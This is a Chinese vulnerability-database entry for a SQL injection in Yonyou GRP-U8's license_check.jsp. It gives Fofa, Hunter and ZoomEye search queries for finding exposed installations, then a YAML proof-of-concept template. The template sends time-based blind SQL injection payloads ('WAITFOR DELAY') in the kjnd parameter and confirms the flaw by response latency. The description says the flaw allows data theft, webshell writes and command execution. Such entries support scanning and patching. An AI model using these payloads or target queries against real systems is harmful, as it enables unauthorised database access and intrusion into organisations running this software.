yonyou-grp-u8-license-check-sqli: 用友GRP-U8 license_check.jsp 存在sql注入漏洞

日期: 2025-09-01 | 影响软件: yonyou-grp-u8 | POC: 已公开

漏洞描述

用友 GRP-U8 license_check.jsp 存在sql注入,攻击者可利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。 Fofa: app="用友-GRP-U8" Hunter: app.name="用友GRP-U8 OA" ZoomEye: app:"用友GRP-U8"

PoC代码[已公开]

id: yonyou-grp-u8-license-check-sqli

info:
  name: 用友GRP-U8 license_check.jsp 存在sql注入漏洞
  author: Y3y1ng
  severity: critical
  verified: true
  description: |
    用友 GRP-U8 license_check.jsp 存在sql注入,攻击者可利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
    Fofa: app="用友-GRP-U8"
    Hunter: app.name="用友GRP-U8 OA"
    ZoomEye: app:"用友GRP-U8"
  reference:
    - https://mp.weixin.qq.com/s/7apjiTP4aNT7E2BUgvb7EQ
  tags: yonyou,u8,sqli
  created: 2023/12/10

rules:
  r0:
    request:
      method: GET
      path: /u8qx/license_check.jsp?kjnd=1';WAITFOR DELAY '0:0:10'--
    expression: response.status == 200 && response.latency <= 12000 &&  response.latency >= 10000
  r1:
    request:
      method: GET
      path: /u8qx/license_check.jsp?kjnd=1';WAITFOR DELAY '0:0:6'--
    expression: response.status == 200 && response.latency <= 8000 &&  response.latency >= 6000
  r2:
    request:
      method: GET
      path: /u8qx/license_check.jsp?kjnd=1';WAITFOR DELAY '0:0:10'--
    expression: response.status == 200 && response.latency <= 12000 &&  response.latency >= 10000
  r3:
    request:
      method: GET
      path: /u8qx/license_check.jsp?kjnd=1';WAITFOR DELAY '0:0:6'--
    expression: response.status == 200 && response.latency <= 8000 &&  response.latency >= 6000
expression: r0() && r1() && r2() && r3()

相关漏洞推荐